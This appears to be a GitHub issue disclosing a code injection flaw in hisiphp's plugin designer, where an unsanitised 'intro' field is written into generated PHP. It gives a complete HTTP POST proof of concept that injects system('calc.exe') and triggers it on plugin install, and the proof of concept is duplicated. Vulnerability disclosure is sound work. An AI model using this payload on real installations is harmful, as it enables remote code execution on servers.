8000 A code injection vulnerability · Issue #11 · hisiphp/hisiphp · GitHub
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content
A code injection vulnerability #11
New issue
New issue
Open
Open
A code injection vulnerability#11
@LioTree

Description

@LioTree
LioTree
opened on Apr 21, 2024

Hi, there is a code injection vulnerability.

In

hisiphp/application/system/admin/Plugins.php

Line 129 in d05c908

$data = $this->request->post();
, $data is controlled by users.

The validator https://github.com/hisiphp/hisiphp/blob/thinkphp5.1/v2/application/system/validate/SystemPlugins.php has been used here to impose restrictions on $data, but only some fields have been limited.

class SystemPlugins extends Validate
{
    //定义验证规则
    protected $rule = [
        'name|插件名称'     => 'require|alpha|unique:system_plugins',
        'title|插件标题'     => 'require|chsAlphaNum|unique:system_plugins',
        'identifier|插件标识' => 'require|regex:/^[A-Za-z0-9\-\.\_]+$/',
        'author|开发者'     => 'requireWith:author|chsAlphaNum',
        'url|开发者网址'     => 'requireWith:url|url',
        'version|版本号'     => 'require|regex:/^[0-9][.][0-9][.][0-9]+$/',
    ];
}

In

hisiphp/application/system/model/SystemPlugins.php

Line 455 in d05c908

'intro' => '{$data['intro']}',
, $data['intro'] is injected into PHP code without restriction.

POC:

POST /admin.php/system/plugins/design.html HTTP/1.1
Host: www.myhisiphp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: http://www.myhisiphp.com
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://www.myhisiphp.com/admin.php/system/plugins/design.html
Cookie: PHPSESSID=fljtslc00l472cll5df60ilp39; hisiadmin_language=zh-cn; hisihisi_admin_theme=default; hisihisi_iframe=1; hisi_language=zh-cn

name=test&title=test&identifier=test&intro=%27%2Esystem%28%27calc%2Eexe%27%29%2E%27&author=test&url=http%3A%2F%2Fwww.test.com&version=1.0.0&dir=admin%0D%0Ahome%0D%0Amodel%0D%0Asql%0D%0Avalidate%0D%0Aview%0D%0A

The content of the generated plugins/test/info.php is as follows:

return [
    //......
    'intro' => ''.system('calc.exe').'',
    //......
];

Visiting /admin.php/system/plugins/install/id/5.html can trigger the execution of malicious code, where 5 is the id of the plugin.

POC:

POST /admin.php/system/plugins/design.html HTTP/1.1
Host: www.myhisiphp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: http://www.myhisiphp.com
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://www.myhisiphp.com/admin.php/system/plugins/design.html
Cookie: PHPSESSID=fljtslc00l472cll5df60ilp39; hisiadmin_language=zh-cn; hisihisi_admin_theme=default; hisihisi_iframe=1; hisi_language=zh-cn

name=test&title=test&identifier=test&intro=%27%2Esystem%28%27calc%2Eexe%27%29%2E%27&author=test&url=http%3A%2F%2Fwww.test.com&version=1.0.0&dir=admin%0D%0Ahome%0D%0Amodel%0D%0Asql%0D%0Avalidate%0D%0Aview%0D%0A

The content of the generated plugins/test/info.php is as follows:

return [
    //......
    'intro' => ''.system('calc.exe').'',
    //......
];

Visiting /admin.php/system/plugins/install/id/5.html can trigger the execution of malicious code, where 5 is the plugin's id.

76328183-023d-4936-8440-e38c1ae568cf

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions
      0